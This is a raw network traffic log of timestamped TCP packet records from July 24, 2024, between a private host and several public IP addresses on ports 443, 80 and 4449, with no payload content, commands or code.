Jul 24, 2024 19:58:16.221076012 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:16.866575956 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:16.866717100 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:16.869287968 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:16.869299889 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:16.869352102 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:16.869355917 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:16.869559050 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:16.869683027 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:16.916500092 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:18.190135002 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:18.190227985 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:18.190274000 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:18.207988977 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:18.208019972 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:18.208050966 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:18.208058119 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:18.313877106 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:18.313930988 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:18.313997984 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:18.314557076 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:18.314565897 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:19.093400955 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:19.093532085 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:19.096620083 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:19.096637011 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:19.096703053 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:19.096708059 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:19.096777916 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:19.096781015 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:19.096894979 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:19.097043037 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:19.140496969 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:20.080297947 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:20.080410004 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:20.080605030 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:20.099742889 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:20.099777937 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:20.099797010 CEST	49828	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:20.099805117 CEST	443	49828	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:20.204591036 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:20.204643011 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:20.204709053 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:20.205173969 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:20.205189943 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:20.866054058 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:20.866136074 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:20.868741989 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:20.868755102 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:20.868796110 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:20.868802071 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:20.868838072 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:20.868841887 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:20.868993998 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:20.869153023 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:20.916493893 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:22.202193022 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:22.202282906 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:22.202339888 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:22.219075918 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:22.219075918 CEST	49829	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:22.219105959 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:22.219118118 CEST	443	49829	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:22.329865932 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:22.329921007 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:22.330082893 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:22.330522060 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:22.330529928 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:22.949995995 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:22.950094938 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:22.952677011 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:22.952693939 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:22.952740908 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:22.952744961 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:22.952784061 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:22.952788115 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:22.953013897 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:22.953133106 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:22.996506929 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:25.273663044 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:25.273881912 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:25.273973942 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:25.295742989 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:25.295787096 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:25.295830011 CEST	49830	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:25.295836926 CEST	443	49830	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:25.407706976 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:25.407768965 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:25.407870054 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:25.408409119 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:25.408421993 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:26.935321093 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:26.935499907 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:26.938836098 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:26.938853979 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:26.938915014 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:26.938920975 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:26.939057112 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:26.939059973 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:26.939227104 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:26.939429998 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:26.939445019 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:27.749439955 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:27.754403114 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:27.754457951 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:27.759339094 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:27.959171057 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:28.083838940 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:28.083929062 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:28.083981991 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:28.100390911 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:28.100411892 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:28.100445032 CEST	49831	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:28.100451946 CEST	443	49831	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:28.114981890 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:28.115046024 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:28.204509974 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:28.204559088 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:28.204628944 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:28.205184937 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:28.205193043 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:28.337250948 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:28.342273951 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:28.342340946 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:28.347176075 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:28.885766983 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:28.886046886 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:28.890856028 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:28.890877008 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:28.890964985 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:28.890970945 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:28.891211987 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:28.891438961 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:28.936508894 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:30.093266964 CEST	49833	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:30.098299980 CEST	80	49833	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:30.098397970 CEST	49833	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:30.098592043 CEST	49833	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:30.098638058 CEST	49833	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:30.103432894 CEST	80	49833	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:30.103466034 CEST	80	49833	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:30.236345053 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:30.236457109 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:30.236630917 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:30.253926039 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:30.253926039 CEST	49832	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:30.253962994 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:30.253976107 CEST	443	49832	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:30.360809088 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:30.360872030 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:30.360944986 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:30.361578941 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:30.361588001 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:31.039865971 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:31.039992094 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:31.042701006 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:31.042716980 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:31.042767048 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:31.042771101 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:31.042992115 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:31.043220997 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:31.084521055 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:31.686600924 CEST	80	49833	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:31.686624050 CEST	80	49833	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:31.686799049 CEST	49833	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:31.686989069 CEST	49833	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:31.692038059 CEST	80	49833	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:32.392841101 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:32.392941952 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:32.393027067 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:32.410428047 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:32.410485029 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:32.410509109 CEST	49834	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:32.410521030 CEST	443	49834	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:32.516906977 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:32.516957045 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:32.517024994 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:32.517458916 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:32.517468929 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:33.170638084 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:33.170815945 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:33.173754930 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:33.173763990 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:33.173839092 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:33.173845053 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:33.174104929 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:33.174247980 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:33.220509052 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:35.149818897 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:35.149915934 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:35.150108099 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:35.167013884 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:35.167013884 CEST	49835	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:35.167108059 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:35.167140007 CEST	443	49835	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:35.298964977 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:35.299025059 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:35.299120903 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:35.312716007 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:35.312741995 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:35.964539051 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:35.964746952 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:35.967227936 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:35.967247963 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:35.967294931 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:35.967300892 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:35.967350006 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:35.967354059 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:35.967457056 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:35.967583895 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:36.012499094 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:37.333326101 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:37.333592892 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:37.333781004 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:37.350502014 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:37.350502968 CEST	49836	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:37.350577116 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:37.350619078 CEST	443	49836	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:37.454685926 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:37.454752922 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:37.454857111 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:37.455492973 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:37.455513954 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:38.088440895 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:38.088541985 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:38.092154026 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:38.092160940 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:38.092261076 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:38.092264891 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:38.092339039 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:38.092343092 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:38.092564106 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:38.092716932 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:38.140494108 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:39.462686062 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:39.463067055 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:39.463279963 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:39.480789900 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:39.480823040 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:39.480839968 CEST	49837	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:39.480846882 CEST	443	49837	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:39.601197004 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:39.601314068 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:39.601505995 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:39.601890087 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:39.601917982 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:40.185184002 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:40.190805912 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:40.190869093 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:40.195779085 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:40.355820894 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:40.355959892 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:40.359189987 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:40.359246016 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:40.359316111 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:40.359338999 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:40.360102892 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:40.360476017 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:40.408504009 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:40.552697897 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:40.672693968 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:40.703304052 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:40.781975031 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:41.313498974 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:41.318934917 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:41.319058895 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:41.324400902 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:41.346980095 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:41.347060919 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:41.347223997 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:41.364192963 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:41.364253998 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:41.364286900 CEST	49838	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:41.364305019 CEST	443	49838	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:41.470031977 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:41.470088005 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:41.470153093 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:41.470601082 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:41.470613003 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:42.089726925 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:42.089818001 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:42.092365980 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:42.092384100 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:42.092427969 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:42.092432022 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:42.092475891 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:42.092478991 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:42.092619896 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:42.092746019 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:42.092756033 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:43.066865921 CEST	49840	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:43.685347080 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:43.685523987 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:43.685604095 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:43.689807892 CEST	80	49840	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:43.689913034 CEST	49840	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:43.690068960 CEST	49840	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:43.690092087 CEST	49840	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:43.700390100 CEST	80	49840	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:43.700572014 CEST	80	49840	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:43.701740980 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:43.701787949 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:43.701816082 CEST	49839	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:43.701832056 CEST	443	49839	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:43.813957930 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:43.814019918 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:43.814162970 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:43.814594030 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:43.814613104 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:44.433449984 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:44.433537960 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:44.435972929 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:44.436017036 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:44.436084032 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:44.436098099 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:44.436306953 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:44.436448097 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:44.480520964 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:45.193727016 CEST	80	49840	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:45.194180012 CEST	80	49840	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:45.194422960 CEST	49840	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:45.194422960 CEST	49840	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:45.200635910 CEST	80	49840	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:45.808576107 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:45.808654070 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:45.808718920 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:45.826142073 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:45.826181889 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:45.826210022 CEST	49841	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:45.826219082 CEST	443	49841	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:45.938956976 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:45.939014912 CEST	443	49842	167.235.128.153	192.168.2.10
